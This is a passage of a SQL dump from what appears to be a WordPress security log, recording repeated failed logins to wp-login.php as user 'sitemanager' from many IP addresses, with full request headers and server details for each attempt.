www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745554928.3536489;s:12:\"REQUEST_TIME\";i:1745554928;}}','95.217.147.111',0,'2025-04-25 09:52:10','1970-01-01 00:00:00'),(94254,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55534\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.32.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745555353.4999371;s:12:\"REQUEST_TIME\";i:1745555353;}}','63.250.32.87',0,'2025-04-25 09:59:15','1970-01-01 00:00:00'),(94255,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48720\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745555789.9236071;s:12:\"REQUEST_TIME\";i:1745555789;}}','199.188.201.172',0,'2025-04-25 10:06:31','1970-01-01 00:00:00'),(94256,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43928\";s:11:\"REMOTE_ADDR\";s:12:\"198.199.67.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745556203.475883;s:12:\"REQUEST_TIME\";i:1745556203;}}','198.199.67.5',0,'2025-04-25 10:13:25','1970-01-01 00:00:00'),(94257,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56838\";s:11:\"REMOTE_ADDR\";s:14:\"192.250.234.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745556618.143795;s:12:\"REQUEST_TIME\";i:1745556618;}}','192.250.234.26',0,'2025-04-25 10:20:20','1970-01-01 00:00:00'),(94258,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36252\";s:11:\"REMOTE_ADDR\";s:13:\"104.43.93.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745557036.074321;s:12:\"REQUEST_TIME\";i:1745557036;}}','104.43.93.163',0,'2025-04-25 10:27:17','1970-01-01 00:00:00'),(94259,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42926\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745557453.8077071;s:12:\"REQUEST_TIME\";i:1745557453;}}','67.223.118.131',0,'2025-04-25 10:34:15','1970-01-01 00:00:00'),(94260,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57692\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745557877.1744871;s:12:\"REQUEST_TIME\";i:1745557877;}}','198.54.114.85',0,'2025-04-25 10:41:18','1970-01-01 00:00:00'),(94261,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47704\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745558298.880625;s:12:\"REQUEST_TIME\";i:1745558298;}}','198.54.114.36',0,'2025-04-25 10:48:20','1970-01-01 00:00:00'),(94262,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57464\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.11.121\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745558720.1674941;s:12:\"REQUEST_TIME\";i:1745558720;}}','139.59.11.121',0,'2025-04-25 10:55:21','1970-01-01 00:00:00'),(94263,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49956\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.200.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745559138.7119181;s:12:\"REQUEST_TIME\";i:1745559138;}}','176.126.200.33',0,'2025-04-25 11:02:20','1970-01-01 00:00:00'),(94264,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 